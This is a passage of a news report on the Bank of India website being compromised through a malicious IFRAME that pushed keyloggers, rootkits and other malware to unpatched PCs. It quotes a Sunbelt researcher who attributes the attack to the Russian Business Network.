Sunbelt learned that thesite had become compromised while researching another malware issue. Thecompany contacted the Bank of India, which shut the site down about 2 a.m. EST Fridayto clean the server, he said. The site is up and running again.
"We tracked communication with [the other malware] tothe Bank of India site," Eckelberry said. "We're fairly certain thiswas done by the RussianBusiness Network (RBN), an underground criminal gang in Russiaresponsible for lot of bad things on the internet."
The exploit appeared to be a malicious IFRAME,which took advantage of a Microsoft Windows 2003 server running the Bank ofIndia site, he added. The IFRAME downloaded a wide variety of malware to PCs that have not been patched since August 2006, Eckelberrysaid.
Among the distributed malware were variants ofTSPY_AGENT.AAVG and Trojan.Netview, several rootkitsand a Trojan.Pandex. The former steals information from active windows onvulnerable end-user PCs, as well as information collected by a keylogger,network configuration and user names and passwords from POP3 and SMTP emailprotocols.
The collected files were uploaded to an FTP server in Russia, according to Sunbelt.
"Bank of India had a hole in its systems, and theRussians took the opportunity to insert code into the page," Eckelberrysaid. "The same thing happened to the SuperBowl site earlier this year."
Click here to email West Coast Bureau Chief Jim Carr.
Click here for the latest SC Magazine Podcast - Aug. 27: A monster (.com) of a data breach